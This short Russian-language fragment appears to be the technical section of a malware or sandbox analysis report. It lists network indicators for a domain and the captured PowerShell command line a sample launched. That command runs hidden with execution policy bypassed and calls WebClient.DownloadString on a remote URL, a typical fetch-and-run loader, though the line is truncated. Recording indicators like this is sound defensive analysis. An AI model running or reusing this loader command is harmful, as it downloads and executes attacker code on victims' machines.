Техническая информация
- $fkdfeuqwrxtoxokdoqxojsikzdhbkahtraz
- 'ap###ltonik.com':443
- 'ap###ltonik.com':443
- DNS ASK ap###ltonik.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Ex Bypass -NoP -C $FkdFEuqWrXTOxOKDoQxOjsiKZdhbkahTRaz='https://appboltonik.com/data.php?10902';$svVxrhlieJIbBjHrYpEOvumE=(New-Object System.Net.WebClient).DownloadString($FkdFEuqWrXTOxOKDoQxO...' (со скрытым окном)